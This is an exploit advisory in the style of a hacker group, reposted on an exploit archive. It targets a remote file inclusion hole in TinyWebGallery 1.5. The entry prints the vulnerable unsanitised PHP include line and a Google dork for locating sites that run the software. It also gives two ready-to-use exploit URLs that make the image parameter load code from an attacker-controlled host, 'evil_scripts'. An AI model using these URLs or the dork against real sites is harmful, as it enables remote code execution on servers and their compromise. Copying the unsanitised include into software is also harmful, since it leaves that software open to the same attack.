id: 672
date: 08/08/2006
title: TinyWebGallery <= 1.5 (image) Remote Include Vulnerabilities
author: xoron
cves: 

============================================================
TinyWebGallery <= 1.5 (image) Remote Include Vulnerabilities
============================================================




####################################################
#                                                  #
#                                                  #
#           C Y B E R - W A R R i O R   T I M      #
#                                                  #
#                                                  #
####################################################


TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
------------------------------------------------------------------------------
Author: xoron
------------------------------------------------------------------------------
Script: TinyWebGallery
------------------------------------------------------------------------------
Class: Remote
------------------------------------------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------------------------------------------
CODE:

<?php
include ($image . ".txt");
?>

------------------------------------------------------------------------------
google dork: "powered by twg"
------------------------------------------------------------------------------

Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts

http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?


###########################################################################
#                                                                         #
#Greetz: Preddy, Iron, x-master, DJR, R3D4C!D and all my friends          #
#                                                                         #
###########################################################################




#  0day.today [2023-03-27]  #